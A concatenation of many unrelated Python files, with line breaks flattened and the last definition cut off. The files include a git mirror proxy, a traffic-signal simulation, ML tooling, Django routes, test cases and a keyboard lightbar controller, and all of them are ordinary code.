CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. import subprocess import sys import os import proxyenvironment def debug(line): with open('/home/git/proxy.log', 'a+') as f: f.write(line + "\n") def exec(command, check): try: result = subprocess.run(command, check=True) except subprocess.CalledProcessError as e: debug(str(e)) if check: raise e def update_cache(repository, dest_path): debug("Updating cache for %s" % repository) if not os.path.exists(dest_path): repository_parts = repository.split(os.sep)[1:] # 1: because the first is empty remote = "ssh://%s@%s:%s%s" % (proxyenvironment.UPSTREAM_USER, proxyenvironment.UPSTREAM_HOST, proxyenvironment.UPSTREAM_PORT, repository) os.makedirs(dest_path) command = ['git', 'clone', '--mirror', remote, dest_path] debug("Cloning repository with %s" % command) exec(command, True) prereceive_path = "%s/hooks/pre-receive" % dest_path debug("Installing write-blocking hook to %s" % prereceive_path) with open(prereceive_path, 'w+') as f: f.writelines(['#!/bin/bash\n', 'echo "You cannot push to the git-wfh proxy"\n', 'exit 1\n']) exec(['chmod', 'ugo+rx', prereceive_path], True) # TODO: Install hooks to prevent pushes else: os.chdir(dest_path) command = ['git', 'fetch', '--prune'] debug("Updating cache with %s" % command) exec(command, False) debug("Proxy called with:") debug(" ".join(sys.argv)) # Remove the first argument (script name) shell_args = sys.argv[1:] # The final argument is the git-shell command and (in quotes) repository repository = shell_args[-1].split()[-1][1:-1] if repository[0] != os.sep: # This happens if it's a ~path repository = os.sep + repository dest_path = '/repositories' + repository update_cache(repository, dest_path) # Now mangle the final part to map it to our cache path final_parts = shell_args[-1].split() final_parts[-1] = "'%s'" % dest_path shell_args[-1] = " ".join(final_parts) command = ['/usr/bin/git-shell'] + shell_args debug("Passing command upstream with %s" % command) exec(command, True)import os def rename_files(): file_list = os.listdir('/Users/cidmedeiros1/Pictures/Piri_Trip') print(file_list) saved_path = os.getcwd() print("Working dir is " + saved_path) os.chdir('/Users/cidmedeiros1/Pictures/Piri_Trip') var0 = '.JPG' var1 = 1 var2 = 'Piri_Trip' for file_name in file_list: print('Old Name was '+file_name) var1 = str(var1) new_file_name = var2+var1+var0 os.rename(file_name,new_file_name) print('New Name is '+new_file_name) var1 = int(var1) var1 = var1+1 rename_files() 1-10 import random import numpy as np from keras.models import Model, Sequential from keras.layers import Dense import pandas as pd import itertools def move(current, previous, wt, wte): if current == previous: count = 2 else: count = 1 wt += len(queues[0]) + len(queues[1]) + len(queues[2]) + len(queues[3]) wte += queues[0].count('e') + queues[1].count('e') + queues[2].count('e') + queues[3].count('e') with open('MLtest.txt', 'a') as f: if current: q0 = min(count, len(queues[0])) q1 = min(count, len(queues[1])) q2 = 0 q3 = 0 f.write(f'{queues[0]} {q0} {queues[1]} {q1} {queues[2]} {q2} {queues[3]} {q3} {current} \n') del queues[0][0:q0] del queues[1][0:q1] return wt, wte else: q0 = 0 q1 = 0 q2 = min(count, len(queues[2])) q3 = min(count, len(queues[3])) f.write(f'{queues[0]} {q0} {queues[1]} {q1} {queues[2]} {q2} {queues[3]} {q3} {current} \n') del queues[2][0:q2] del queues[3][0:q3] return wt, wte def algorithm(c): if 'e' in queues[0] or 'e' in queues[1]: return True if 'e' in queues[2] or 'e' in queues[3]: return False if c: tpc = min(2, len(queues[0])) + min(2, len(queues[1])) tpa = min(1, len(queues[2])) + min(1, len(queues[3])) else: tpa = min(2, len(queues[0])) + min(2, len(queues[1])) tpc = min(1, len(queues[2])) + min(1, len(queues[3])) if tpa > tpc: return not c else: return c def train(queues, c, e0, e1): if e0: return True if e1: return False if c: tpc = min(2, queues[0]) + min(2, queues[1]) tpa = min(1, queues[2]) + min(1, queues[3]) else: tpa = min(2, queues[0]) + min(2, queues[1]) tpc = min(1, queues[2]) + min(1, queues[3]) if tpa > tpc: return not c else: return c def timer(c, t): t += 1 if t == 60: c = not c return c, t elif t == 80: t = 0 c = not c return c, t else: return c, t def add_cars(q, num_emergency): n = random.choice(qp[q]) re = [] for _ in range(n): c = np.random.choice(['n', 'e'], p = [299/300, 1/300]) if c == 'e': num_emergency += 1 re.append(c) return re, num_emergency M = 'ML' if M == 'ML': r = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10] c = [False, True] e0 = [False, True] e1 = [False, True] product = list(itertools.product(r, r, r, r, c, e0, e1)) res = [] for p in product: res.append(train(p[:4], p[4], p[5], p[6])) df = pd.DataFrame() df['Q1'] = [k[0] for k in product] df['Q2'] = [k[1] for k in product] df['Q3'] = [k[2] for k in product] df['Q4'] = [k[3] for k in product] df['C'] = [k[4] for k in product] df['e0'] = [k[5] for k in product] df['e1'] = [k[6] for k in product] df['R'] = res X = df[['Q1','Q2','Q3','Q4','C', 'e0', 'e1']] y = df['R'] model = Sequential() model.add(Dense(6, input_dim=7, activation='relu')) model.add(Dense(1, activation='sigmoid')) model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy']) model.fit(X, y, epochs=50) _, accuracy = model.evaluate(X, y) print('Accuracy: %.2f' % (accuracy*100)) qp = [[0] * 9 + [1], [0] * 9 + [1], [0] * 19 + [1], [0] * 19 + [1]] l = [] le = [] ta = 0 for __ in range(100): current = True previous = True wt = 0 wte = 0 t = 0 num_cars = 0 num_emergency = 0 queues = [[], [], [], []] for _ in range(3600): previous = current for x in range(4): n, num_emergency = add_cars(x, num_emergency) num_cars += len(n) queues[x] += n if M == 'timer': current, t = timer(current, t) elif M == 'algorithm': current = algorithm(current) else: if 'e' in queues[0] or 'e' in queues[1]: e0 = True else: e0 = False if 'e' in queues[2] or 'e' in queues[3]: e1 = True else: e1 = False X = pd.DataFrame([{'Q1':len(queues[0]), 'Q2':len(queues[1]), 'Q3':len(queues[2]), 'Q4':len(queues[3]), 'C':current, 'e0':e0, 'e1':e1}]) current = model.predict(X)[0][0] if current >= 0.5: current = True else: current = False wt, wte = move(current, previous, wt, wte) l.append(wt/num_cars) if num_emergency: le.append(wte/num_emergency) print(f'{M}: {np.mean(l)}') print(f'Emergency {M}: {np.mean(le)}') # -*- coding: utf-8 -*- import argparse from phys2bids import __version__ def _get_parser(): """ Parses command line inputs for this function Returns ------- parser.parse_args() : argparse dict """ parser = argparse.ArgumentParser() # Argument parser follow template provided by RalphyZ. # https://stackoverflow.com/a/43456577 optional = parser._action_groups.pop() required = parser.add_argument_group('Required Argument:') required.add_argument('-in', '--input-file', dest='filename', type=str, help=('The name of the acq file, with or without ' 'extension. Must be an .acq file!'), required=True) optional.add_argument('-info', '--info', dest='info', action='store_true', help='Only output file info, don\'t process.', default=False) optional.add_argument('-indir', '--input-dir', dest='indir', type=str, help='Folder containing input.', default='.') optional.add_argument('-outdir', '--output-dir', dest='outdir', type=str, help=('Folder where output should be placed.' 'If \"-heur\" is used, it\'ll become ' 'the site folder. Requires \"-sub\",' ' and it\'s possible to specify \"-ses\""'), default='.') optional.add_argument('-heur', '--heuristic', dest='heur_file', type=str, help=('File containing heuristic, with or without ' 'extension. Specify path to it if necessary.'), default=None) # optional.add_argument('-hdir', '--heur-dir', # dest='heurdir', # type=str, # help='Folder containing heuristic file.', # default='.') optional.add_argument('-sub', '--subject', dest='sub', type=str, help=('To be specified with \"-heur\". Code of ' 'subject to process.' 'Specify path to it if necessary.'), default=None) optional.add_argument('-ses', '--session', dest='ses', type=str, help=('To be specified with \"-heur\". Code of ' 'session to process.' 'Specify path to it if necessary.'), default=None) optional.add_argument('-chtrig', '--channel-trigger', dest='chtrig', type=int, help=('The number corresponding to the trigger channel.' ' Channel numbering starts with 0'), default=1) optional.add_argument('-chsel', '--channel-selection', dest='chsel', nargs='*', type=int, help='The number corresponding to the channels to process.', default=None) optional.add_argument('-ntp', '--numtps', dest='num_tps_expected', type=int, help='Number of expected timepoints.', default=0) optional.add_argument('-tr', '--tr', dest='tr', type=float, help='TR of sequence in seconds.', default=1) optional.add_argument('-thr', '--threshold', dest='thr', type=float, help='Threshold used for trigger detection.', default=2.5) optional.add_argument('-tbhd', '--table-header', dest='table_header', nargs='*', type=str, help='Columns header (for json file).', # #!# Has to go to empty list default=['time', 'respiratory_chest', 'trigger', 'cardiac', 'respiratory_CO2', 'respiratory_O2']) optional.add_argument('-v', '--version', action='version', version=('%(prog)s ' + __version__)) parser._action_groups.append(optional) return parser if __name__ == '__main__': raise RuntimeError('phys2bids/cli/run.py should not be run directly;\n' 'Please `pip install` phys2bids and use the ' '`phys2bids` command') hhyluor/Code_Repository- from django.urls import re_path from . import views urlpatterns = [ re_path(r'^usernames/(?P[a-zA-Z0-9_-]{5,20})/count/$', views.UsernameCountView.as_view()), re_path(r'^mobiles/(?P1[3-9]\d{9})/count/$', views.MobileCountView.as_view()), re_path(r'^register/$', views.RegisterView.as_view()), re_path(r'^login/$', views.LoginView.as_view()), re_path(r'^logout/$', views.LogoutView.as_view()), re_path(r'^info/$', views.UserInfoView.as_view()), re_path(r'^emails/$', views.EmailView.as_view()), re_path(r'^emails/verification/$', views.VerifyEmailView.as_view()), re_path(r'^addresses/create/$', views.CreateAddressView.as_view()), re_path(r'^addresses/$', views.AddressView.as_view()), re_path(r'^addresses/(?P\d+)/$', views.UpdateDestroyAddressView.as_view()), re_path(r'^addresses/(?P\d+)/default/$', views.ChangeDefaultAddressView.as_view()), re_path(r'^addresses/(?P\d+)/title/$', views.UpdateTitleAddressView.as_view()), re_path(r'^password/$', views.ChangePasswordView.as_view()), re_path(r'^browse_histories/$', views.SaveHistoryView.as_view()), ] from catvae.models.linear_cat_vae import LinearCatVAE from catvae.models.linear_cat_vae import LinearBatchCatVAE from catvae.models.linear_vae import LinearVAE from catvae.models.linear_vae import LinearDLRVAE from catvae.models.linear_vae import LinearBatchVAE from catvae.models.batch_classifier import Q2BatchClassifier __all__ = ['LinearCatVAE', 'LinearBatchCatVAE', 'LinearVAE', 'LinearDLRVAE', 'LinearBatchVAE', 'Q2BatchClassifier'] 0 #!/usr/bin/env python # -*- coding: utf-8 -*- from pyautocad import Autocad, APoint acad = Autocad() acad.prompt("Hello, Autocad from Python\n") print(acad.doc.Name) p1 = APoint(0, 0) p2 = APoint(50, 25) for i in range(5): text = acad.model.AddText('Hi %s!' % i, p1, 2.5) acad.model.AddLine(p1, p2) acad.model.AddCircle(p1, 10) p1.y += 10 dp = APoint(10, 0) for text in acad.iter_objects('Text'): print('text: %s at: %s' % (text.TextString, text.InsertionPoint)) text.InsertionPoint = APoint(text.InsertionPoint) + dp for obj in acad.iter_objects(['Circle', 'Line']): print(obj.ObjectName)# Copyright 2017 The dm_control Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """Point-mass domain.""" import collections from dm_control import mujoco from dm_control.rl import control from dm_control.suite import base from dm_control.suite import common from dm_control.suite.utils import randomizers from dm_control.utils import containers from dm_control.utils import rewards import numpy as np _DEFAULT_TIME_LIMIT = 20 SUITE = containers.TaggedTasks() def get_model_and_assets(): """Returns a tuple containing the model XML string and a dict of assets.""" return common.read_model('point_mass.xml'), common.ASSETS @SUITE.add('benchmarking', 'easy') def easy(time_limit=_DEFAULT_TIME_LIMIT, random=None, environment_kwargs=None): """Returns the easy point_mass task.""" physics = Physics.from_xml_string(*get_model_and_assets()) task = PointMass(randomize_gains=False, random=random) environment_kwargs = environment_kwargs or {} return control.Environment( physics, task, time_limit=time_limit, **environment_kwargs) @SUITE.add() def hard(time_limit=_DEFAULT_TIME_LIMIT, random=None, environment_kwargs=None): """Returns the hard point_mass task.""" physics = Physics.from_xml_string(*get_model_and_assets()) task = PointMass(randomize_gains=True, random=random) environment_kwargs = environment_kwargs or {} return control.Environment( physics, task, time_limit=time_limit, **environment_kwargs) @SUITE.add() def go_horizontal(time_limit=_DEFAULT_TIME_LIMIT, random=None, environment_kwargs=None): """Returns the easy point_mass task, with target x = 0.""" physics = Physics.from_xml_string(*get_model_and_assets()) task = PointMass(randomize_gains=False, random=random, move_dir='horizontal') environment_kwargs = environment_kwargs or {} return control.Environment( physics, task, time_limit=time_limit, **environment_kwargs) @SUITE.add() def go_vertical(time_limit=_DEFAULT_TIME_LIMIT, random=None, environment_kwargs=None): """Returns the easy point_mass task, with target y = 0.""" physics = Physics.from_xml_string(*get_model_and_assets()) task = PointMass(randomize_gains=False, random=random, move_dir='vertical') environment_kwargs = environment_kwargs or {} return control.Environment( physics, task, time_limit=time_limit, **environment_kwargs) class Physics(mujoco.Physics): """physics for the point_mass domain.""" def mass_to_target(self): """Returns the vector from mass to target in global coordinate.""" return (self.named.data.geom_xpos['target'] - self.named.data.geom_xpos['pointmass']) def mass_to_target_x(self): """Returns the distance from mass to x = 0 target.""" return np.linalg.norm((self.named.data.geom_xpos['target'][0] - self.named.data.geom_xpos['pointmass'][0])) def mass_to_target_y(self): """Returns the distance from mass to y = 0 target.""" return np.linalg.norm((self.named.data.geom_xpos['target'][1] - self.named.data.geom_xpos['pointmass'][1])) def mass_to_target_dist(self): """Returns the distance from mass to the target.""" return np.linalg.norm(self.mass_to_target()) class PointMass(base.Task): """A point_mass `Task` to reach target with smooth reward.""" def __init__(self, randomize_gains, random=None, move_dir=None): """Initialize an instance of `PointMass`. Args: randomize_gains: A `bool`, whether to randomize the actuator gains. random: Optional, either a `numpy.random.RandomState` instance, an integer seed for creating a new `RandomState`, or None to select a seed automatically (default). move_direction: Optional, if the target is x = 0 or y = 0. Default target is (x,y) = (0,0). """ self._randomize_gains = randomize_gains super().__init__(random = random) self._move_dir = move_dir def initialize_episode(self, physics): """Sets the state of the environment at the start of each episode. If _randomize_gains is True, the relationship between the controls and the joints is randomized, so that each control actuates a random linear combination of joints. Args: physics: An instance of `mujoco.Physics`. """ randomizers.randomize_limited_and_rotational_joints(physics, self.random) if self._randomize_gains: dir1 = self.random.randn(2) dir1 /= np.linalg.norm(dir1) # Find another actuation direction that is not 'too parallel' to dir1. parallel = True while parallel: dir2 = self.random.randn(2) dir2 /= np.linalg.norm(dir2) parallel = abs(np.dot(dir1, dir2)) > 0.9 physics.model.wrap_prm[[0, 1]] = dir1 physics.model.wrap_prm[[2, 3]] = dir2 super().initialize_episode(physics) def get_observation(self, physics): """Returns an observation of the state.""" obs = collections.OrderedDict() obs['position'] = physics.position() obs['velocity'] = physics.velocity() return obs def get_reward(self, physics): """Returns a reward to the agent.""" target_size = physics.named.model.geom_size['target', 0] near_target = rewards.tolerance(physics.mass_to_target_dist(), bounds=(0, target_size), margin=target_size) if self._move_dir == 'horizontal': near_target = rewards.tolerance(physics.mass_to_target_x(), bounds=(0, target_size), margin=target_size) elif self._move_dir == 'vertical': near_target = rewards.tolerance(physics.mass_to_target_y(), bounds=(0, target_size), margin=target_size) control_reward = rewards.tolerance(physics.control(), margin=1, value_at_margin=0, sigmoid='quadratic').mean() small_control = (control_reward + 4) / 5 return near_target * small_control lim/__init__.py0 # -*- coding: utf-8 -*- import datetime import os import pathlib import pbr.version import textwrap # PBR has a bug that produces incorrect version numbers # if you run ``psec --version`` in another Git repo. # This attempted workaround only uses PBR for getting # version and revision number if run in a directory # path that contains strings that appear to be # a python_secrets repo clone. p = pathlib.Path(os.getcwd()) if 'lim-cli' in p.parts or 'lim' in p.parts: try: version_info = pbr.version.VersionInfo('lim') __version__ = version_info.cached_version_string() __release__ = version_info.release_string() except Exception: pass else: __version__ = '20.6.3' __release__ = __version__ BUFFER_SIZE = 128 * 1024 DAY = os.environ.get('DAY', 5) DEFAULT_PROTOCOLS = ['icmp', 'tcp', 'udp'] KEEPALIVE = 5.0 LIM_DATA_DIR = os.environ.get('LIM_DATA_DIR', os.getcwd()) MAX_LINES = None MAX_ITEMS = 10 # Use syslog for logging? # TODO(dittrich): Make this configurable, since it can fail on Mac OS X SYSLOG = False __author__ = '' __email__ = '' def copyright(): """Copyright string""" this_year = datetime.datetime.today().year copyright = textwrap.dedent( f"""Author: <> Copyright: 2018-{ this_year }, . 2019-{ this_year }, Liminal Information Corp. License: Apache 2.0 License URL: https://pypi.python.org/pypi/lim-cli""") # noqa return copyright # vim: set ts=4 sw=4 tw=0 et : import os import uuid from typing import Tuple, Dict import onnx import torch.cuda from nebullvm.base import ModelParams, DeepLearningFramework from nebullvm.config import ( AUTO_TVM_TUNING_OPTION, AUTO_TVM_PARAMS, NO_COMPILER_INSTALLATION, ) from nebullvm.inference_learners.tvm import ( TVM_INFERENCE_LEARNERS, ApacheTVMInferenceLearner, ) from nebullvm.optimizers.base import BaseOptimizer, get_input_names try: import tvm from tvm import IRModule from tvm.runtime.ndarray import NDArray from tvm.autotvm.tuner import XGBTuner from tvm import autotvm import tvm.relay as relay except ImportError: import warnings if not NO_COMPILER_INSTALLATION: warnings.warn( "Not found any valid tvm installation. " "Trying to install it from source." ) from nebullvm.installers.installers import install_tvm install_tvm() import tvm from tvm import IRModule from tvm.runtime.ndarray import NDArray from tvm.autotvm.tuner import XGBTuner from tvm import autotvm import tvm.relay as relay else: warnings.warn("Not found any valid tvm installation") # TVM objects needed for avoiding errors IRModule = object NDArray = object class ApacheTVMOptimizer(BaseOptimizer): """Class for compiling the AI models on Nvidia GPUs using TensorRT.""" def optimize( self, onnx_model: str, output_library: DeepLearningFramework, model_params: ModelParams, ) -> ApacheTVMInferenceLearner: """Optimize the input model with Apache TVM. Args: onnx_model (str): Path to the saved onnx model. output_library (str): DL Framework the optimized model will be compatible with. model_params (ModelParams): Model parameters. Returns: ApacheTVMInferenceLearner: Model optimized with TVM. The model will have an interface in the DL library specified in `output_library`. """ target = self._get_target() mod, params = self._build_tvm_model(onnx_model, model_params) tuning_records = self._tune_tvm_model(target, mod, params) with autotvm.apply_history_best(tuning_records): with tvm.transform.PassContext(opt_level=3, config={}): lib = relay.build(mod, target=target, params=params) model = TVM_INFERENCE_LEARNERS[output_library].from_runtime_module( network_parameters=model_params, lib=lib, target_device=target, input_names=get_input_names(onnx_model), ) return model @staticmethod def _build_tvm_model( onnx_model_path: str, model_params: ModelParams ) -> Tuple[IRModule, Dict[str, NDArray]]: shape_dict = { input_key: ( model_params.batch_size, *input_size, ) for input_key, input_size in zip( get_input_names(onnx_model_path), model_params.input_sizes ) } onnx_model = onnx.load(onnx_model_path) mod, params = relay.frontend.from_onnx(onnx_model, shape_dict) return mod, params @staticmethod def _get_target() -> str: force_on_cpu = int(os.getenv("TVM_ON_CPU", 0)) > 1 if not force_on_cpu and torch.cuda.is_available(): return str(tvm.target.cuda()) else: return "llvm" # run on CPU @staticmethod def _tune_tvm_model( target: str, mod: IRModule, params: Dict[str, NDArray] ) -> str: """Tune the model using AutoTVM.""" # TODO: add support to Ansor tuning_records = f"{uuid.uuid4()}_model_records.json" # create a TVM runner runner = autotvm.LocalRunner( number=AUTO_TVM_PARAMS["number"], repeat=AUTO_TVM_PARAMS["repeat"], timeout=AUTO_TVM_PARAMS["timeout"], min_repeat_ms=AUTO_TVM_PARAMS["min_repeat_ms"], # TODO modify min_repeat_ms for GPU usage enable_cpu_cache_flush=True, ) # begin by extracting the tasks from the onnx model tasks = autotvm.task.extract_from_program( mod["main"], target=target, params=params ) # Tune the extracted tasks sequentially. for i, task in enumerate(tasks): tuner_obj = XGBTuner(task, loss_type="rank") tuner_obj.tune( n_trial=min( AUTO_TVM_TUNING_OPTION["trials"], len(task.config_space) ), early_stopping=AUTO_TVM_TUNING_OPTION["early_stopping"], measure_option=autotvm.measure_option( builder=autotvm.LocalBuilder(build_func="default"), runner=runner, ), callbacks=[ autotvm.callback.log_to_file(tuning_records), ], ) return tuning_records # -*- coding: utf-8 -*- """ file: model_networking.py Graph model classes for dealing with network communication """ import re import logging import ipaddress import uritools import socket from graphit import __module__ from graphit.graph_py2to3 import to_unicode, PY_STRING from graphit.graph_mixin import NodeEdgeToolsBaseClass __all__ = ['IP4Address', 'IP6Address'] logger = logging.getLogger(__module__) HOSTNAME_REGEX = re.compile( r'^(([a-zA-Z]{1})|([a-zA-Z]{1}[a-zA-Z]{1})|' r'([a-zA-Z]{1}[0-9]{1})|([0-9]{1}[a-zA-Z]{1})|' r'([a-zA-Z0-9][-_.a-zA-Z0-9]{0,61}[a-zA-Z0-9]))\.' r'([a-zA-Z]{2,13}|[a-zA-Z0-9-]{2,30}.[a-zA-Z]{2,3})$' ) class IP4Address(NodeEdgeToolsBaseClass): def set(self, key, value=None): """ Validate and set IP4 address according to the "dotted-quad" ABNF syntax as defined in RFC 2673 """ if key == self.data.key_tag: try: ip = ipaddress.ip_address(to_unicode(value)) if ip.version != 4: logger.error('{0} is of IP protocol {1} not 4'.format(value, ip.version)) except ipaddress.AddressValueError: logger.error('{0} not a valid IP4 address'.format(value)) self.nodes[self.nid][key] = value class IP6Address(NodeEdgeToolsBaseClass): def set(self, key, value=None): """ Validate and set IP6 address according to RFC 4291 """ if key == self.data.key_tag: try: ip = ipaddress.ip_address(to_unicode(value)) if ip.version != 6: logger.error('{0} is of IP protocol {1} not 6'.format(value, ip.version)) except ipaddress.AddressValueError: logger.error('{0} not a valid IP6 address'.format(value)) self.nodes[self.nid][key] = value class Hostname(NodeEdgeToolsBaseClass): @staticmethod def hostname(): """ Get hostname of current machine """ return socket.gethostname() def set(self, key=None, value=None): """ Validate and set a hostname according to RFC 1034 with idn support in as in RFC 5890. Set to current hostname if called without arguments. * Should be string * Maximum length of DNS name is 253 characters * Validate against hostname regex """ key = key or self.data.value_tag if key == self.data.value_tag: if not value: value = self.hostname() if not isinstance(value, PY_STRING) or len(value) > 253 or not HOSTNAME_REGEX.match(value): logger.error('Not a valid hostname: {0}'.format(value)) return self.nodes[self.nid][key] = value class URI(NodeEdgeToolsBaseClass): """ Methods for working with Universal Resource Identifiers (URIs) in accordance to RFC 3986 with support for unicode. """ @property def scheme(self): uri = self.get() if uri: parts = uritools.urisplit(uri) return parts.scheme @property def authority(self): uri = self.get() if uri: parts = uritools.urisplit(uri) return parts.authority @property def port(self): uri = self.get() if uri: parts = uritools.urisplit(uri) return parts.port @property def path(self): uri = self.get() if uri: parts = uritools.urisplit(uri) return parts.path @property def query(self): uri = self.get() if uri: parts = uritools.urisplit(uri) return parts.query @property def fragment(self): uri = self.get() if uri: parts = uritools.urisplit(uri) return parts.fragment @staticmethod def compose(scheme=None, authority=None, path=None, query=None, fragment=None, port=None): parts = uritools.uricompose(scheme=scheme, host=authority, port=port, path=path, query=query, fragment=fragment) return uritools.uriunsplit(parts) def set(self, key, value, **kwarg): """ Validate and set RFC 3986 compliant, Unicode-aware, scheme-agnostic URIs """ if key == self.data.value_tag: if isinstance(value, PY_STRING): parsed = uritools.urisplit(value) if parsed.scheme and parsed.authority and parsed.path: logger.error('No valid URI: {0}'.format(value)) return self.nodes[self.nid][key] = value from hashlib import md5 from sentry.utils.cache import cache def cache_this(timeout=60): def decorator(func): def wrapper(*args, **kwargs): def get_cache_key(*args, **kwargs): params = list(args) + kwargs.values() return md5("".join(map(str, params))).hexdigest() key = get_cache_key(func.__name__, *args, **kwargs) result = cache.get(key) if not result: result = func(*args, **kwargs) cache.set(key, result, timeout) return result return wrapper return decorator def get_int(value, default=0): try: return int(value) except ValueError: return default Bitkeen/amcc #!/usr/bin/env python from amcc_ui import Ui from blessed import Terminal from configparser import ConfigParser from word_parser import WordParser if __name__ == '__main__': config = ConfigParser() config.read('amcc.conf') # Select the 'main' section from the config file. parser_config = config['main'] ui_config = config['ui'] term = Terminal() with term.fullscreen(): ui = Ui(ui_config, term) parser = WordParser(parser_config, ui) parser.start() tests/test_discretisation/test_equal_frequency_discretiser.py import pandas as pd import pytest from sklearn.exceptions import NotFittedError from feature_engine.discretisation import EqualFrequencyDiscretiser def test_automatically_find_variables_and_return_as_numeric(df_normal_dist): # test case 1: automatically select variables, return_object=False transformer = EqualFrequencyDiscretiser(q=10, variables=None, return_object=False) X = transformer.fit_transform(df_normal_dist) # output expected for fit attr _, bins = pd.qcut(x=df_normal_dist["var"], q=10, retbins=True, duplicates="drop") bins[0] = float("-inf") bins[len(bins) - 1] = float("inf") # expected transform output X_t = [x for x in range(0, 10)] # test init params assert transformer.q == 10 assert transformer.variables == ["var"] assert transformer.return_object is False # test fit attr assert transformer.input_shape_ == (100, 1) # test transform output assert (transformer.binner_dict_["var"] == bins).all() assert all(x for x in X["var"].unique() if x not in X_t) # in equal frequency discretisation, all intervals get same proportion of values assert len((X["var"].value_counts()).unique()) == 1 def test_automatically_find_variables_and_return_as_object(df_normal_dist): # test case 2: return variables cast as object transformer = EqualFrequencyDiscretiser(q=10, variables=None, return_object=True) X = transformer.fit_transform(df_normal_dist) assert X["var"].dtypes == "O" def test_error_when_q_not_number(): with pytest.raises(ValueError): EqualFrequencyDiscretiser(q="other") def test_error_if_return_object_not_bool(): with pytest.raises(ValueError): EqualFrequencyDiscretiser(return_object="other") def test_error_if_input_df_contains_na_in_fit(df_na): # test case 3: when dataset contains na, fit method with pytest.raises(ValueError): transformer = EqualFrequencyDiscretiser() transformer.fit(df_na) def test_error_if_input_df_contains_na_in_transform(df_vartypes, df_na): # test case 4: when dataset contains na, transform method with pytest.raises(ValueError): transformer = EqualFrequencyDiscretiser() transformer.fit(df_vartypes) transformer.transform(df_na[["Name", "City", "Age", "Marks", "dob"]]) def test_non_fitted_error(df_vartypes): with pytest.raises(NotFittedError): transformer = EqualFrequencyDiscretiser() transformer.transform(df_vartypes) import numpy as np from PyQt5.QtGui import * from PyQt5.QtWidgets import * class TuxedoKeyboard: def __init__(self, node): self.node = node self.gamma = (0.55, 0.48, 0.43) # needs to be calibrated self.state = node.load_state() # init qt gui menu = node.get_tray_menu() app = node.get_application() self.init_gui(menu, app) # register callbacks self.node.add_event_callback("resume", self.on_resume) self.node.add_event_callback("suspend", self.on_suspend) self.node.add_event_callback("lid_opened", self.on_lid_opened) self.node.add_event_callback("lid_closed", self.on_lid_closed) self.node.add_event_callback("on_ac", self.on_ac) self.node.add_event_callback("on_battery", self.on_battery) self.node.add_event_callback("exit", self.on_exit) self.reload_state() def on_resume(self, event): self.reload_state() def on_suspend(self, event): self.apply_lightbar_color( (0.0, 0.0, 0.0), save_state=False) def on_lid_opened(self, event): pass #self.reload_state() def on_lid_closed(self, event): pass #self.apply_lightbar_color( (0.0, 0.0, 0.0), save_state=False) def on_ac(self, event): pass def on_battery(self, event): pass def on_exit(self, event): self.apply_lightbar_color( (0.0, 0.0, 0.0), save_state=False) def reload_state(self): if self.state is not None and "lb_mode" in self.state: if self.state["lb_mode"] == "mono": self.apply_lightbar_color(self.state["value"]) elif self.state["lb_mode"] == "animation": self.apply_lightbar_animation(self.state["value"]) else: # default: self.apply_lightbar_animation() def init_gui(self, menu, app): self.lb = QMenu("LightBar") self.lb_ac0 = QAction("Turn Off"); self.lb_ac0.triggered.connect(lambda: self.apply_lightbar_color( (0.0, 0.0, 0.0)) ); self.lb.addAction(self.lb_ac0) self.lb_ac1 = QAction("Animation"); self.lb_ac1.triggered.connect(lambda: self.apply_lightbar_animation() ); self.lb.addAction(self.lb_ac1) self.lb_ac2 = QAction("White"); self.lb_ac2.triggered.connect(lambda: self.apply_lightbar_color( (1.0, 1.0, 1.0)) ); self.lb.addAction(self.lb_ac2) self.lb_ac3 = QAction("Red"); self.lb_ac3.triggered.connect(lambda: self.apply_lightbar_color( (1.0, 0, 0)) ); self.lb.addAction(self.lb_ac3) self.lb_ac4 = QAction("Green"); self.lb_ac4.triggered.connect(lambda: self.apply_lightbar_color( ( 0, 1.0, 0)) ); self.lb.addAction(self.lb_ac4) self.lb_ac5 = QAction("Blue"); self.lb_ac5.triggered.connect(lambda: self.apply_lightbar_color( ( 0, 0, 1.0)) ); self.lb.addAction(self.lb_ac5) self.lb_ac6 = QAction("Pick a color"); self.lb_ac6.triggered.connect(lambda: self.apply_lightbar_color( self.mono_color_picker()) ); self.lb.addAction(self.lb_ac6) menu.addMenu(self.lb) def color_to_voltage(self, color): return np.power(color, 1./np.array(self.gamma)) def mono_color_picker(self): color = QColorDialog.getColor().getRgb() return (color[0]/255, color[1]/255, color[2]/255) def apply_lightbar_color(self, color, save_state=True): voltage = self.color_to_voltage(color) with open('/sys/class/leds/lightbar_rgb:1:status/brightness', 'w') as f: f.write(str(int(voltage[0]*36))) with open('/sys/class/leds/lightbar_rgb:2:status/brightness', 'w') as f: f.write(str(int(voltage[1]*36))) with open('/sys/class/leds/lightbar_rgb:3:status/brightness', 'w') as f: f.write(str(int(voltage[2]*36))) if save_state: self.state = {"lb_mode": "mono", "value": color} self.node.save_state(self.state) def apply_lightbar_animation(self, value=1, save_state=True): with open('/sys/class/leds/lightbar_animation::status/brightness', 'w') as f: f.write(str(int(value))) if save_state: self.state = {"lb_mode": "animation", "value": value} self.node.save_state(self.state)#!/usr/bin/env python import collections import sys import itertools from optparse import OptionParser from Bio import AlignIO import numpy def 